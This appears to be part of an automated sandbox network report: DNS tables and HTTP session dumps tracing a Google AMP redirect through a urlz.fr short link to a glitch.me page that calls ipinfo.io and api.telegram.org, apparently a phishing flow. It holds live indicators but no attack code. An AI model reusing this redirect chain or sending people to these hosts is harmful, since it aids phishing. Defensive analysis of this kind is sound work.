                                                          Dec 3, 2024 03:27:06.341005087 CET6519953192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:06.341156006 CET5296053192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:06.480654001 CET53651991.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:06.480876923 CET53529601.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:07.269759893 CET4989053192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:07.269903898 CET5754753192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:07.272464037 CET4977553192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:07.272881031 CET6499353192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:07.412856102 CET53497751.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:07.412904024 CET53649931.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:08.528384924 CET6095053192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:08.528698921 CET5770253192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:09.765249014 CET53577021.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:09.765261889 CET53575471.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:09.765845060 CET53498901.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:09.766237974 CET53609501.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:12.850730896 CET6022053192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:12.850893974 CET6476653192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:12.990922928 CET53602201.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:12.990997076 CET53647661.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:16.645258904 CET6417453192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:16.646069050 CET5963353192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:16.785191059 CET53641741.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:16.899414062 CET53596331.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:18.570833921 CET5172453192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:18.571088076 CET5329953192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:18.571830988 CET6207153192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:18.571974039 CET6413553192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:18.710031033 CET53517241.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:18.710314989 CET53532991.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:18.711884975 CET53641351.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:18.818077087 CET53620711.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:20.597454071 CET6083553192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:20.597681046 CET5506653192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:20.601095915 CET5808253192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:20.601264000 CET6194953192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:20.736443043 CET53608351.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:20.737283945 CET53550661.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:20.740227938 CET53580821.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:20.815196991 CET53619491.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:22.901690960 CET6272753192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:22.901819944 CET6470953192.168.2.41.1.1.1
                                                          Dec 3, 2024 03:27:23.038325071 CET53626131.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:23.041801929 CET53647091.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:23.041943073 CET53627271.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:44.172003031 CET53542221.1.1.1192.168.2.4
                                                          Dec 3, 2024 03:27:50.137273073 CET53540041.1.1.1192.168.2.4
                                                          TimestampSource IPDest IPChecksumCodeType
                                                          Dec 3, 2024 03:26:50.364351034 CET192.168.2.41.1.1.1c222(Port unreachable)Destination Unreachable
                                                          Dec 3, 2024 03:26:57.662223101 CET192.168.2.41.1.1.1c24c(Port unreachable)Destination Unreachable
                                                          Dec 3, 2024 03:27:05.775006056 CET192.168.2.41.1.1.1c1f8(Port unreachable)Destination Unreachable
                                                          Dec 3, 2024 03:27:09.766397953 CET192.168.2.41.1.1.1c1ee(Port unreachable)Destination Unreachable
                                                          Dec 3, 2024 03:27:16.899656057 CET192.168.2.41.1.1.1c23c(Port unreachable)Destination Unreachable
                                                          Dec 3, 2024 03:27:20.815368891 CET192.168.2.41.1.1.1c235(Port unreachable)Destination Unreachable
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Dec 3, 2024 03:26:48.608418941 CET192.168.2.41.1.1.10x730fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:26:48.608465910 CET192.168.2.41.1.1.10xb5e4Standard query (0)www.google.com65IN (0x0001)false
                                                          Dec 3, 2024 03:26:50.125413895 CET192.168.2.41.1.1.10xdf02Standard query (0)www.google.co.thA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:26:50.125623941 CET192.168.2.41.1.1.10x338Standard query (0)www.google.co.th65IN (0x0001)false
                                                          Dec 3, 2024 03:26:53.632282019 CET192.168.2.41.1.1.10xfc90Standard query (0)urlz.frA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:26:53.632520914 CET192.168.2.41.1.1.10x4f8cStandard query (0)urlz.fr65IN (0x0001)false
                                                          Dec 3, 2024 03:26:53.894243956 CET192.168.2.41.1.1.10x8ed0Standard query (0)urlz.frA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:26:53.894273996 CET192.168.2.41.1.1.10x1417Standard query (0)urlz.fr65IN (0x0001)false
                                                          Dec 3, 2024 03:26:57.360223055 CET192.168.2.41.1.1.10x93dcStandard query (0)troubled-worried-bamboo.glitch.meA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:26:57.360477924 CET192.168.2.41.1.1.10x56f7Standard query (0)troubled-worried-bamboo.glitch.me65IN (0x0001)false
                                                          Dec 3, 2024 03:27:00.806376934 CET192.168.2.41.1.1.10x5b52Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:00.806652069 CET192.168.2.41.1.1.10x4b4eStandard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                          Dec 3, 2024 03:27:00.807936907 CET192.168.2.41.1.1.10x7749Standard query (0)kit.fontawesome.comA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:00.808067083 CET192.168.2.41.1.1.10xdcb5Standard query (0)kit.fontawesome.com65IN (0x0001)false
                                                          Dec 3, 2024 03:27:03.505875111 CET192.168.2.41.1.1.10xdf24Standard query (0)www.tradekorea.comA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:03.506259918 CET192.168.2.41.1.1.10xf37bStandard query (0)www.tradekorea.com65IN (0x0001)false
                                                          Dec 3, 2024 03:27:03.514606953 CET192.168.2.41.1.1.10xb2d0Standard query (0)i.gyazo.comA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:03.515117884 CET192.168.2.41.1.1.10xfdf5Standard query (0)i.gyazo.com65IN (0x0001)false
                                                          Dec 3, 2024 03:27:03.855097055 CET192.168.2.41.1.1.10xb797Standard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:03.856702089 CET192.168.2.41.1.1.10xc4b3Standard query (0)logo.clearbit.com65IN (0x0001)false
                                                          Dec 3, 2024 03:27:04.528251886 CET192.168.2.41.1.1.10x855aStandard query (0)www.tradekorea.comA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:04.528465986 CET192.168.2.41.1.1.10x85eStandard query (0)www.tradekorea.com65IN (0x0001)false
                                                          Dec 3, 2024 03:27:06.341005087 CET192.168.2.41.1.1.10x1439Standard query (0)i.gyazo.comA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:06.341156006 CET192.168.2.41.1.1.10xd4bbStandard query (0)i.gyazo.com65IN (0x0001)false
                                                          Dec 3, 2024 03:27:07.269759893 CET192.168.2.41.1.1.10x4afdStandard query (0)kita.netA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:07.269903898 CET192.168.2.41.1.1.10x4900Standard query (0)kita.net65IN (0x0001)false
                                                          Dec 3, 2024 03:27:07.272464037 CET192.168.2.41.1.1.10x6dc2Standard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:07.272881031 CET192.168.2.41.1.1.10x1c90Standard query (0)logo.clearbit.com65IN (0x0001)false
                                                          Dec 3, 2024 03:27:08.528384924 CET192.168.2.41.1.1.10xb1bStandard query (0)kita.netA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:08.528698921 CET192.168.2.41.1.1.10xfdf5Standard query (0)kita.net65IN (0x0001)false
                                                          Dec 3, 2024 03:27:12.850730896 CET192.168.2.41.1.1.10xcbb1Standard query (0)kita.netA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:12.850893974 CET192.168.2.41.1.1.10xea99Standard query (0)kita.net65IN (0x0001)false
                                                          Dec 3, 2024 03:27:16.645258904 CET192.168.2.41.1.1.10xbadaStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:16.646069050 CET192.168.2.41.1.1.10x6a1dStandard query (0)ipinfo.io65IN (0x0001)false
                                                          Dec 3, 2024 03:27:18.570833921 CET192.168.2.41.1.1.10xd424Standard query (0)dns.googleA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:18.571088076 CET192.168.2.41.1.1.10x30d4Standard query (0)dns.google65IN (0x0001)false
                                                          Dec 3, 2024 03:27:18.571830988 CET192.168.2.41.1.1.10x1d5bStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:18.571974039 CET192.168.2.41.1.1.10xfd1eStandard query (0)ipinfo.io65IN (0x0001)false
                                                          Dec 3, 2024 03:27:20.597454071 CET192.168.2.41.1.1.10xf243Standard query (0)dns.googleA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:20.597681046 CET192.168.2.41.1.1.10x233eStandard query (0)dns.google65IN (0x0001)false
                                                          Dec 3, 2024 03:27:20.601095915 CET192.168.2.41.1.1.10xc2fStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:20.601264000 CET192.168.2.41.1.1.10xc094Standard query (0)api.telegram.org65IN (0x0001)false
                                                          Dec 3, 2024 03:27:22.901690960 CET192.168.2.41.1.1.10xf252Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:22.901819944 CET192.168.2.41.1.1.10xa3b6Standard query (0)api.telegram.org65IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Dec 3, 2024 03:26:48.748085022 CET1.1.1.1192.168.2.40x730fNo error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:26:48.748245955 CET1.1.1.1192.168.2.40xb5e4No error (0)www.google.com65IN (0x0001)false
                                                          Dec 3, 2024 03:26:50.264748096 CET1.1.1.1192.168.2.40xdf02No error (0)www.google.co.th172.217.21.35A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:26:53.886363029 CET1.1.1.1192.168.2.40xfc90No error (0)urlz.fr104.21.234.214A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:26:53.886363029 CET1.1.1.1192.168.2.40xfc90No error (0)urlz.fr104.21.234.215A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:26:53.892307043 CET1.1.1.1192.168.2.40x4f8cNo error (0)urlz.fr65IN (0x0001)false
                                                          Dec 3, 2024 03:26:54.033624887 CET1.1.1.1192.168.2.40x8ed0No error (0)urlz.fr104.21.234.214A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:26:54.033624887 CET1.1.1.1192.168.2.40x8ed0No error (0)urlz.fr104.21.234.215A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:26:54.034671068 CET1.1.1.1192.168.2.40x1417No error (0)urlz.fr65IN (0x0001)false
                                                          Dec 3, 2024 03:26:57.595671892 CET1.1.1.1192.168.2.40x93dcNo error (0)troubled-worried-bamboo.glitch.me35.153.112.86A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:26:57.595671892 CET1.1.1.1192.168.2.40x93dcNo error (0)troubled-worried-bamboo.glitch.me44.217.165.223A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:26:57.595671892 CET1.1.1.1192.168.2.40x93dcNo error (0)troubled-worried-bamboo.glitch.me54.204.140.196A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:26:57.595671892 CET1.1.1.1192.168.2.40x93dcNo error (0)troubled-worried-bamboo.glitch.me54.227.225.255A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:26:57.595671892 CET1.1.1.1192.168.2.40x93dcNo error (0)troubled-worried-bamboo.glitch.me52.44.230.20A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:26:57.595671892 CET1.1.1.1192.168.2.40x93dcNo error (0)troubled-worried-bamboo.glitch.me23.21.241.83A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:26:57.595671892 CET1.1.1.1192.168.2.40x93dcNo error (0)troubled-worried-bamboo.glitch.me107.23.200.217A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:26:57.595671892 CET1.1.1.1192.168.2.40x93dcNo error (0)troubled-worried-bamboo.glitch.me34.197.170.180A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:00.947784901 CET1.1.1.1192.168.2.40x7749No error (0)kit.fontawesome.comkit.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                          Dec 3, 2024 03:27:00.947794914 CET1.1.1.1192.168.2.40x4b4eNo error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                          Dec 3, 2024 03:27:00.947968960 CET1.1.1.1192.168.2.40xdcb5No error (0)kit.fontawesome.comkit.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                          Dec 3, 2024 03:27:00.948641062 CET1.1.1.1192.168.2.40x5b52No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:00.948641062 CET1.1.1.1192.168.2.40x5b52No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:03.657454967 CET1.1.1.1192.168.2.40xb2d0No error (0)i.gyazo.com104.18.24.163A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:03.657454967 CET1.1.1.1192.168.2.40xb2d0No error (0)i.gyazo.com104.18.25.163A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:03.657820940 CET1.1.1.1192.168.2.40xfdf5No error (0)i.gyazo.com65IN (0x0001)false
                                                          Dec 3, 2024 03:27:04.414361954 CET1.1.1.1192.168.2.40xc4b3No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                          Dec 3, 2024 03:27:04.416078091 CET1.1.1.1192.168.2.40xb797No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                          Dec 3, 2024 03:27:04.416078091 CET1.1.1.1192.168.2.40xb797No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.64A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:04.416078091 CET1.1.1.1192.168.2.40xb797No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.47A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:04.416078091 CET1.1.1.1192.168.2.40xb797No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.65A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:04.416078091 CET1.1.1.1192.168.2.40xb797No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.72A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:05.771507978 CET1.1.1.1192.168.2.40x855aNo error (0)www.tradekorea.com203.233.202.194A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:05.774947882 CET1.1.1.1192.168.2.40xdf24No error (0)www.tradekorea.com203.233.202.194A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:06.480654001 CET1.1.1.1192.168.2.40x1439No error (0)i.gyazo.com104.18.25.163A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:06.480654001 CET1.1.1.1192.168.2.40x1439No error (0)i.gyazo.com104.18.24.163A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:06.480876923 CET1.1.1.1192.168.2.40xd4bbNo error (0)i.gyazo.com65IN (0x0001)false
                                                          Dec 3, 2024 03:27:07.412856102 CET1.1.1.1192.168.2.40x6dc2No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                          Dec 3, 2024 03:27:07.412856102 CET1.1.1.1192.168.2.40x6dc2No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.72A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:07.412856102 CET1.1.1.1192.168.2.40x6dc2No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.47A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:07.412856102 CET1.1.1.1192.168.2.40x6dc2No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.65A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:07.412856102 CET1.1.1.1192.168.2.40x6dc2No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.64A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:07.412904024 CET1.1.1.1192.168.2.40x1c90No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                          Dec 3, 2024 03:27:09.765845060 CET1.1.1.1192.168.2.40x4afdNo error (0)kita.net203.233.202.180A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:09.766237974 CET1.1.1.1192.168.2.40xb1bNo error (0)kita.net203.233.202.180A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:12.990922928 CET1.1.1.1192.168.2.40xcbb1No error (0)kita.net203.233.202.180A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:16.785191059 CET1.1.1.1192.168.2.40xbadaNo error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:18.710031033 CET1.1.1.1192.168.2.40xd424No error (0)dns.google8.8.8.8A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:18.710031033 CET1.1.1.1192.168.2.40xd424No error (0)dns.google8.8.4.4A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:18.818077087 CET1.1.1.1192.168.2.40x1d5bNo error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:20.736443043 CET1.1.1.1192.168.2.40xf243No error (0)dns.google8.8.8.8A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:20.736443043 CET1.1.1.1192.168.2.40xf243No error (0)dns.google8.8.4.4A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:20.740227938 CET1.1.1.1192.168.2.40xc2fNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                          Dec 3, 2024 03:27:23.041943073 CET1.1.1.1192.168.2.40xf252No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                          • www.google.co.th
                                                          • fs.microsoft.com
                                                          • urlz.fr
                                                          • troubled-worried-bamboo.glitch.me
                                                          • slscr.update.microsoft.com
                                                          • https:
                                                            • maxcdn.bootstrapcdn.com
                                                            • i.gyazo.com
                                                            • logo.clearbit.com
                                                            • kita.net
                                                            • ipinfo.io
                                                            • dns.google
                                                            • api.telegram.org
                                                          • otelrules.azureedge.net
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.449739184.30.17.174443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:26:50 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          Accept-Encoding: identity
                                                          User-Agent: Microsoft BITS/7.8
                                                          Host: fs.microsoft.com
                                                          2024-12-03 02:26:51 UTC478INHTTP/1.1 200 OK
                                                          Content-Type: application/octet-stream
                                                          Server: Kestrel
                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                          X-Ms-ApiVersion: Distribute 1.2
                                                          X-Ms-Region: prod-weu-z1
                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                          X-OSID: 2
                                                          X-CID: 2
                                                          X-CCC: GB
                                                          Cache-Control: public, max-age=61296
                                                          Date: Tue, 03 Dec 2024 02:26:51 GMT
                                                          Connection: close
                                                          X-CID: 2


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.449741172.217.21.35443732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:26:52 UTC992OUTGET /url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku HTTP/1.1
                                                          Host: www.google.co.th
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-User: ?1
                                                          Sec-Fetch-Dest: document
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-03 02:26:52 UTC1002INHTTP/1.1 302 Found
                                                          Location: https://www.google.co.th/amp/urlz.fr/tiku
                                                          Cache-Control: private
                                                          Content-Type: text/html; charset=UTF-8
                                                          Strict-Transport-Security: max-age=31536000
                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-Ji1yuUDHFaVVqSswcOz3Eg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                          Permissions-Policy: unload=()
                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                          Date: Tue, 03 Dec 2024 02:26:52 GMT
                                                          Server: gws
                                                          Content-Length: 238
                                                          X-XSS-Protection: 0
                                                          Set-Cookie: NID=519=wOmr2tFOJNTz_9kO8qLieKjcRTOEYFsTx5JuxiWXNiw3CSC0CHQLOn678Sl3GdPkDt-hJc9uU7eIqgdcvjGeqjCKVTMQevK-o5uFdMv3xQ73k02dwzsxhVVTGAxofKBM3BxQ8W9wV7obwndAI9EdwDfb9DiedEOmhQwtbOivnmK5sL7zxeEX2vUrpHy1NFrNCldp; expires=Wed, 04-Jun-2025 02:26:52 GMT; path=/; domain=.google.co.th; Secure; HttpOnly; SameSite=none
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close
                                                          2024-12-03 02:26:52 UTC238INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 74 68 2f 61 6d 70 2f 75 72 6c 7a 2e 66 72 2f 74 69 6b 75 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                          Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.co.th/amp/urlz.fr/tiku">here</A>.</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.449742184.30.17.174443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:26:52 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          Accept-Encoding: identity
                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                          Range: bytes=0-2147483646
                                                          User-Agent: Microsoft BITS/7.8
                                                          Host: fs.microsoft.com
                                                          2024-12-03 02:26:53 UTC535INHTTP/1.1 200 OK
                                                          Content-Type: application/octet-stream
                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                          ApiVersion: Distribute 1.1
                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                          X-Azure-Ref: 0SyaoYgAAAACHM3u5nQtYS605XTu+5FyaTE9OMjFFREdFMDIxMgBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                          Cache-Control: public, max-age=121213
                                                          Date: Tue, 03 Dec 2024 02:26:53 GMT
                                                          Content-Length: 55
                                                          Connection: close
                                                          X-CID: 2
                                                          2024-12-03 02:26:53 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.449740172.217.21.35443732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:26:52 UTC1026OUTGET /amp/urlz.fr/tiku HTTP/1.1
                                                          Host: www.google.co.th
                                                          Connection: keep-alive
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-User: ?1
                                                          Sec-Fetch-Dest: document
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: NID=519=wOmr2tFOJNTz_9kO8qLieKjcRTOEYFsTx5JuxiWXNiw3CSC0CHQLOn678Sl3GdPkDt-hJc9uU7eIqgdcvjGeqjCKVTMQevK-o5uFdMv3xQ73k02dwzsxhVVTGAxofKBM3BxQ8W9wV7obwndAI9EdwDfb9DiedEOmhQwtbOivnmK5sL7zxeEX2vUrpHy1NFrNCldp
                                                          2024-12-03 02:26:53 UTC833INHTTP/1.1 302 Found
                                                          Location: http://urlz.fr/tiku
                                                          Cache-Control: private
                                                          X-Robots-Tag: noindex
                                                          Content-Type: text/html; charset=UTF-8
